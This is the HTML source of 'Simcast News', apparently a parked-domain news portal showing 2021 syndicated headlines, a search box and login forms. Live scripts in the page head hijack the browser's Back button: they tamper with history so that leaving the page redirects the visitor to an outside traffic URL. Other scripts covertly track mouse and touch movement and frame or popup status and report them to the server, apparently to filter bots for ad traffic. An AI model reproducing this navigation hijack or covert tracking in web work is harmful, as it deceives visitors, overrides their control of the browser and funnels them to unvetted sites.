<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Welcome to the Simcast News portal.</title>
        <meta charset="UTF-8">
        <meta name="description" content="Search on topics your interested. Read great personalised news.">
        <meta name="keywords" content="search,news,automotive,beauty,education,events,fashion,finance,games,health,home,insurance,legal,pets,property,shopping,sports,technology,transport,travel,utilties">
        <meta name="author" content="Simcast">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="/templates/simcast/favicon.png" type="image/x-icon">
        <script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous" ></script>
        <link type="text/css" href="/templates/simcast/css/html.css" rel="stylesheet" >
        <link href="/lib/fontawesome-5.9.0/css/all.min.css" rel="stylesheet" >

        <script>
    (function (window, location) {
        var redirect = "http://go.anticswatc.com/ts8229-backbutton-us";
        var currentUrl = location.origin + location.pathname + location.search;
        if (location.hash !== "#!/hst") {
            history.replaceState(null, document.title, currentUrl + "#!/hst");
            history.pushState(null, document.title, currentUrl);
        }

        window.addEventListener("popstate", function () {
            if (location.hash === "#!/hst") {
                setTimeout(function () {
                    window.location.replace(redirect);
                }, 0);
            }
        }, false);
    }(window, location));
</script><script type="text/javascript">
    $(document).ready(function () {
        var totX = 0;
        var totY = 0;
        var startx = 0;
        var starty = 0;
        var mess = 0;

            //test for javascript
            var fra = 0;
            var ip = 0;
            var infr = window.self !== window.top;
            if (infr) {
                fra = 1;
            }
            var pop = (window.opener !== undefined && window.opener !== null && window.opener !== window);
            if (pop) {
                ip = 1;
            }
            $.ajax({
                method: "GET",
                url: "/widgets/ms/js.php?fra=" + fra + "&ip=" + ip
            });
            document.addEventListener('touchstart', function (e) {
            var touchobj = e.changedTouches[0]; // first touch
            totX = totX + parseInt(touchobj.clientX);
            totY = totY + parseInt(touchobj.clientY);
        }, false);

        document.addEventListener('touchend', function (e) {
            var touchobj = e.changedTouches[0]; // last touch
            totX = totX + abs(parseInt(touchobj.clientX) - startx);
            totY = totY + abs(parseInt(touchobj.clientY) - starty);
        }, false);

        document.onmousemove = function (e) {
            totX = totX + e.pageX;
            totY = totY + e.pageY;
        };
        setInterval(checkCursor, 200);

        function checkCursor() {
            if ((totX !== 0) || (totY !== 0)) {
                if (mess !== 2) {
                    mess = 2;
                    document.cookie = "mess=2";
                    $.ajax({
                        method: "GET",
                        url: "/widgets/ms/up.php?mess=" + mess
                    });
                }
            }
        }
    }
    );
</script>
        <script>
            $(document).ready(function () {
                if ($(".columns").text().length === 0) {
                    $('.columns').hide();
                }
            });
        </script>
        <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async=""></script>
        <script>
            var OneSignal = window.OneSignal || [];
            OneSignal.push(function () {
                OneSignal.init({
                    appId: "4c7b68c0-29d9-46be-b278-bfc487c22942"
                });
            });
        </script>

    </head>
    <body id="mainbody">
        <div class="menutop clearfix">
            <div id="plBanner">
                <script id="parklogic" type="text/javascript" src="https://parking2.parklogic.com/page/enhance.js?pcId=56&domain=androiddevs.net"></script>
            </div>
            <div class='logo-block'><a href='/widgets/banners/rules.php?bid=110&wid=2&tid=59&d=androiddevs.net' target=''><img src='/templates/simcast/images/simcastlogo_35y.png' alt='Simcast Logo' style='max-width:169;max-height:35;' class='logo-image'></a></div><div class='menu-block'><ul class='dropdown'><li><a href='/news'  title='News'>News</a><ul></ul></li><li><a href='/Entertainment'  title='Entertainment'>Entertainment</a><ul></ul></li><li><a href='/Money'  title='Money'>Money</a><ul></ul></li><li><a href='/Lifestyle'  title='Lifestyle'>Lifestyle</a><ul></ul></li><li><a href='/Health'  title='Health'>Health</a><ul></ul></li><li><a href='/Travel'  title='Travel'>Travel</a><ul></ul></li><li><a href='/Video'  title='Videos'>Videos</a><ul></ul></li><li><a href='/Sports'  title='Sports'>Sports</a><ul></ul></li><li><a href='/About-Us' onclick='return myConfirm("/About-Us");' title='About Us'>About Us</a><ul><li><a href='/about-us/About-Simcast'  title='About Simcast'>About Simcast</a><ul></ul></li><li><a href='/about-us/Contact-Us'  title='Contact Us'>Contact Us</a><ul></ul></li><li><a href='/about-us/Policies'  title='Policies'>Policies</a><ul><li><a href='/about-us/policies/Privacy-Policy'  title='Privacy Policy'>Privacy Policy</a><ul></ul></li><li><a href='/about-us/policies/Terms-of-Use'  title='Terms of Use'>Terms of Use</a><ul></ul></li></ul></li></ul></li></ul></div>        <script>
            function myConfirm(message) {
                switch (message.length) {
                    case 0:
                        message = "WARNING!\nAre you sure you want to do this?";
                    case 1:
                        message = "";
                        break;
                }
                if (confirm(message) === true) {
                    return true;
                } else {
                    return false;
                }
            }
        </script>
                    <div class="powered-block">Powered by <em><strong>Microsoft News</strong></em></div>
        </div>
        <div id="contentwrapper">
                            <div class='search-block'>
                    <div class='search-inputblock'>
                <h2 class='search-heading'>Search Internet</h2>
                <form method="post" action="/widgets/searches/rl.php" >
                                        <input type="text" name="q" value="Search here"
                           onblur="if (this.value === '') {
                                       this.value = 'Search here';
                                       this.style.color = '#BBB';
                                   }"
                           onfocus="if (this.value === 'Search here') {
                                       this.value = '';
                                       this.style.color = '#000';
                                   }"
                           class='search-inputbox'  aria-label='Search here'/>
                    <input name="inputboxvar" type="hidden" value="q" />
                    <input name="ms" type="hidden" value="0" />
                    <input name="remote" type="hidden" value="1" />
                    &nbsp; <input name="sub" type="submit"  class='search-button' value='Search' aria-label='Search'/>
                </form>
            </div>
                </div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jquery-modal/0.9.1/jquery.modal.min.css" />
<style>
    p.modalheading {
        font-size:24px;
        font-weight:bold;
        color:#A67EAC;
        padding:10px 0px;
    }
    .modalinput {
        font-size: 14px;
        padding: 6px 12px;
        height: 20px;
        width:200px;
        color: #555;
        border: 1px solid #A67EAC;
        border-radius: 4px;
    }
    .modalbutton {
        height: 35px;
        width: 90px;
        border-radius: 5px;
        border:0px;
        margin: 10px 0px 10px 0px;
        color: #fff;
        padding: 0px 10px 0px 10px;
        font-size: 18px !important;
        background-color: #865E8C;
        cursor: pointer;
    }
    .modalbutton:hover {
        background-color:#A67EAC;
    }
</style>
<script>
    function displayModal(mm) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm);
    }
    function displayComment(mm, k, id) {
        $('#modalout').load('/widgets/modal/modal.php?mm=' + mm + "&k=" + k + "&id=" + id);
    }
    $(document).ready(function () {
        var mm = 0;
        if (mm !== 0) {
            displayModal(mm);
        }
    });

</script>
<div id="modalout"></div>











            <div class="articlewrapper">
                <div class="row">
                    
<div class='leftcolumn'>
            <div class='majorArticle-block'>
            <a href='/widgets/tk/msc.php?id=0&k=news' target="_BLANK">
                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUy4d.img?h=500&w=1000&x=500&y=250&m=2'  class='majorArticle-image'>
                <div class='majorArticle-title'>
                    'Egregious comments': Virginia city fires police officer over alleged Kyle Rittenhouse defense fund donation                </div>
            </a>
        </div>
                <div id='trendingnews'>
        <div class='trendingnewsheading'>Trending News</div>            <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=1&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1dZiq6.img?h=100&w=100&x=50&y=50&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Johnson & Johnson trial shows vaccine effective, even against variants                             <div class='textArticle-abstract'>
                                Johnson & Johnson's single-shot coronavirus vaccine protected against symptomatic and asymptomatic infection, and prevented hospitalization and death in all participants 28 days after vaccination, according to new clinical trial results published Wednesday.The...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBUvpML.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    The Hill&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=2&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUvuW.img?h=100&w=100&x=50&y=50&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            After Chauvin verdict, Senate optimism grows around police reform named for George Floyd                             <div class='textArticle-abstract'>
                                Sen. Tim Scott thinks he is nearing a compromise with Democrats that Republicans will support.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBAJ56P.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    NBC News&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=3&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fTVUy.img?h=100&w=100&x=50&y=50&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Momentum Grows in Congress for Legislation Confronting China                             <div class='textArticle-abstract'>
                                Congress is moving with increasing urgency on bipartisan legislation to confront China and bolster U.S. competitiveness in technology and critical manufacturing with the Senate poised to act within weeks on a package of bills.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA3lldo.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    Bloomberg&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=4&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUnAn.img?h=100&w=100&x=50&y=50&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Biden to end Trump-era California emissions battle: report                             <div class='textArticle-abstract'>
                                US President Joe Biden is set to announce an end to a legal battle with California, established under his predecessor Donald Trump, over the state's right to set stricter vehicle emission standards, the Wall Street Journal reported Wednesday. California...                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    AFP&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=5&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUr6l.img?h=100&w=100&x=880.5&y=586.5&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Biden is set to officially recognize the Armenian genocide, despite warnings from Turkey it could 'worsen                            <div class='textArticle-abstract'>
                                Turkey has urged Biden against recognizing the killings as genocide at a time when the dynamic between Washington and Ankara is already contentious.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10dZOG.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    Business Insider&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                        <div class='textArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=6&k=news' class='textArticle-link' target="_BLANK">
                    <div class='textArticle-imageblock'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUxTM.img?h=100&w=100&x=880.5&y=586.5&m=5'  class='textArticle-image'>
                    </div>
                    <div class='textArticle-textcontent'>
                        <div class='textArticle-title'>
                            Motel’s Lawsuit Says Small Town’s Efforts to Kick Out Sex Offenders Is Unconstitutional                             <div class='textArticle-abstract'>
                                The motel owner might have the law on their side. The post Motel’s Lawsuit Says Small Town’s Efforts to Kick Out Sex Offenders Is Unconstitutional first appeared on Law & Crime.                            </div>
                            <div class='textArticle-provider'>
                                <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBH6sN1.img' style='height:18px;float:left;'>
                                <div style='font-size:11px;margin:4px 0px 0px 4px;float:left;'>
                                    Law & Crime&nbsp;&nbsp;                                </div>
                                                            </div>
                        </div>
                    </div>
                </a>
            </div>
                </div>
    </div>
<div class='middlecolumn'>
    <div style="margin-bottom:10px;">
            <script>
        $(document).ready(function () {
            $("#signin").show();
            $("#signup").hide();
            $("#signinbutton").addClass('login-buttonselected');
            $("#signupbutton").addClass('login-buttonunselected');

            $("#signinbutton").click(function () {
                $("#signin").show();
                $("#signup").hide();
                $("#signinbutton").removeClass('login-buttonunselected');
                $("#signinbutton").addClass('login-buttonselected');
                $("#signupbutton").removeClass('login-buttonselected');
                $("#signupbutton").addClass('login-buttonunselected');
            });
            $("#signupbutton").click(function () {
                $("#signin").hide();
                $("#signup").show();
                $("#signinbutton").removeClass('login-buttonselected');
                $("#signinbutton").addClass('login-buttonunselected');
                $("#signupbutton").removeClass('login-buttonunselected');
                $("#signupbutton").addClass('login-buttonselected');
            });

        });
    </script>
        <div class='login-block' >
        <div class='login-heading'>
            <button id='signinbutton' class='login-button'>Sign-in</button>&nbsp;&nbsp;&nbsp;&nbsp;
            <button id='signupbutton' class='login-button'>Sign-up</button></div>
        <div id='signin'>
            <form action=/widgets/login/login.php method="POST">
                <div class='login-fieldnames'>USERNAME</div>
                <input type="text" id="emaillogin" name="emaillogin" value="Email Address" class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Email Address';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Email Address') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }"><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="passwordlogin" name="passwordlogin" value="Password"  class='login-input' 
                       onblur="if (this.value == '') {
                                   this.value = 'Password';
                                   this.style.color = '#ddd';
                               }"
                       onfocus="if (this.value == 'Password') {
                                   this.value = '';
                                   this.style.color = '#FFF';
                               }">
                <input type="checkbox" name="remember" value="" checked>&nbsp;<span  class='login-remember'>Remember me</span><br>
                <input type="hidden" name="link" value='/'>
                <input type="submit" name="sub" value="Sign-in" class='login-submit'>
            </form>
            <div class='login-forgot'><a href='javascript:displayModal(1)' class='login-forgotlink'>Forgot password</a></div>
        </div>
        <div id='signup'>
            <form action=/widgets/login/signup.php method="POST" id='signupform'>
                <div class='login-fieldnames'>NAME</div>
                <input type="text" id="name" name="name" value="" class='login-input'><br>
                <div class='login-fieldnames'>EMAIL</div>
                <input type="text" id="email" name="email" value="" class='login-input'><br>
                <div class='login-fieldnames'>PASSWORD</div>
                <input type="password" id="password" name="password" value=""  class='login-input'>
                <input type="checkbox" id="terms" name="terms" value="" checked>&nbsp;<span class='login-terms'>
                    Agree to the <a href='/about-us/policies/Terms-of-Use' target='_BLANK' class='login-terms'>Terms of Use</a></span><br>
                <input type="hidden" name="path" value='/'>
                <input type="hidden" name="recaptcha" value='0'>
                                <input type="submit" name="signup" value="Sign-up"  class='login-submit'>
            </form>
        </div>
    </div>
        </div>
    <div class='breakingnews'>
        Breaking News
    </div>
                <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e1lRd.img?h=70&w=95&x=47&y=35&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-text' target="_BLANK">
                        Florida’s transgender sports ban headed for defeat in GOP-controlled state Senate                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=7&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO6J5d.img' style='height:18px;float:left;'>&nbsp;
                        POLITICO&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdl52.img?h=70&w=95&x=780.5&y=476.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-text' target="_BLANK">
                        South Dakota bans vaccine passports                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=8&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABp9vq.img' style='height:18px;float:left;'>&nbsp;
                        Washington Examiner&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB173Zbh.img?h=70&w=95&x=738&y=277&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-text' target="_BLANK">
                        Infrastructure negotiations: Republicans to unveil $600 billion framework as Democrats try to iron out issues                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=9&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywGC0.img' style='height:18px;float:left;'>&nbsp;
                        CNN&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUjGO.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-text' target="_BLANK">
                        The story behind the Oscar-nominated documentary China doesn't want you to see                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=10&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABiyAn.img' style='height:18px;float:left;'>&nbsp;
                        ABC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUjEa.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-text' target="_BLANK">
                        DA: No charges against officer in Tennessee school shooting                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=11&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AACl4vY.img' style='height:18px;float:left;'>&nbsp;
                        Associated Press&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUv2v.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-text' target="_BLANK">
                        Sudan talks tough with Ethiopia over River Nile dam                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=12&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBolVIq.img' style='height:18px;float:left;'>&nbsp;
                        BBC News&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fRYVT.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-text' target="_BLANK">
                        Hello, new iMac: What we think of Apple's redesigned M1-powered Mac so far                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=13&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17VHmX.img' style='height:18px;float:left;'>&nbsp;
                        CNET&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUv6g.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-text' target="_BLANK">
                        Roderick Sykes, co-founder of L.A. Black art enclave St. Elmo Village, dies                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=14&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14LSTu.img' style='height:18px;float:left;'>&nbsp;
                        The LA Times&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fU0ZH.img?h=70&w=95&x=983&y=381.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-text' target="_BLANK">
                        Columbus police have killed the second-highest number of children of any local law-enforcement agency since 2013, according to police accountability data                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=15&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10dZNR.img' style='height:18px;float:left;'>&nbsp;
                        INSIDER&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUxiQ.img?h=70&w=95&x=869.5&y=543.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-text' target="_BLANK">
                        Matt Gaetz runs to Roger Stone after support from Republican colleagues dries up                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=16&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19qi7V.img' style='height:18px;float:left;'>&nbsp;
                        Salon&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
                        <div class='minorArticle-block clearfix'>
                <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-imagelink' target="_BLANK">
                    <div class='minorimage-block'>
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUkZz.img?h=70&w=95&x=869.5&y=543.5&m=2'  class='minorArticle-image'>
                    </div>
                </a>
                <div class='minorArticle-title'>
                    <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-text' target="_BLANK">
                        Rescue Flights Sends Dozens of Heartworm-Positive Dogs into Loving Homes and Healthier Futures                    </a>
                </div>
                <div class='provider'>
                    <a href='/widgets/tk/msc.php?id=17&k=news' class='minorArticle-newsprovider' target="_BLANK">
                        <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywHbG.img' style='height:18px;float:left;'>&nbsp;
                        People&nbsp;&nbsp;                    </a>
                                    </div>
            </div>
            </div>
<div class='rightcolumn'>
    <div id="sidebar">
                        <div id="categories">
            <div id='category-bar'>Categories</div>
            <div class='category-block'><a href=/entertainment class=category-textlink>Entertainment</a><br>
<a href=/health class=category-textlink>Health</a><br>
<a href=/lifestyle class=category-textlink>Lifestyle</a><br>
<a href=/money class=category-textlink>Money</a><br>
<a href=/news class=category-textlink>News</a><br>
<a href=/sports class=category-textlink>Sports</a><br>
<a href=/travel class=category-textlink>Travel</a><br>
<a href=/videos class=category-textlink>Videos</a><br></div>        </div>
                <div style='text-align:center;'>
                        <div class='imageArticle-block'>
                <a href='/widgets/tk/msc.php?id=18&k=news' target="_BLANK">
                    <img src='https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1fUllv.img?h=400&w=300&x=923&y=632.5&m=2'  class='imageArticle-image'>
                    <div class='imageArticle-title'>MailOnline logo</div>
                </a>
            </div>
                                </div>
    </div>
</div>
<div class='farrightcolumn'>
    </div>
                </div>
            </div>
            <div id="footer">
                <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NPHB61BDSE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-NPHB61BDSE');
</script><div class='article-block'><table border="0" cellpadding="1" style="width:50%">
	<tbody>
		<tr>
			<td style="width:33%"><a class="footerlink" href="/news">News</a><br />
			<a class="footerlink" href="/autos">Automotive</a><br />
			<a class="footerlink" href="/money">Money</a><br />
			<a class="footerlink" href="/entertainment">Entertainment</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:33%"><a class="footerlink" href="/health">Health</a><br />
			<a class="footerlink" href="/travel">Travel</a><br />
			<a class="footerlink" href="/video">Videos</a><br />
			<a class="footerlink" href="/sports">Sports</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:34%"><a class="footerlink" href="/about-us/About-Simcast">About Us</a><br />
			<a class="footerlink" href="/about-us/Contact-Us">Contact Us</a><br />
			<a class="footerlink" href="/about-us/policies/Privacy-Policy">Privacy Policy</a><br />
			<a class="footerlink" href="/about-us/policies/Terms-of-Use">Terms of Use</a></td>
		</tr>
	</tbody>
</table>
</div>            </div>
                    </div>
    </body>
</html>

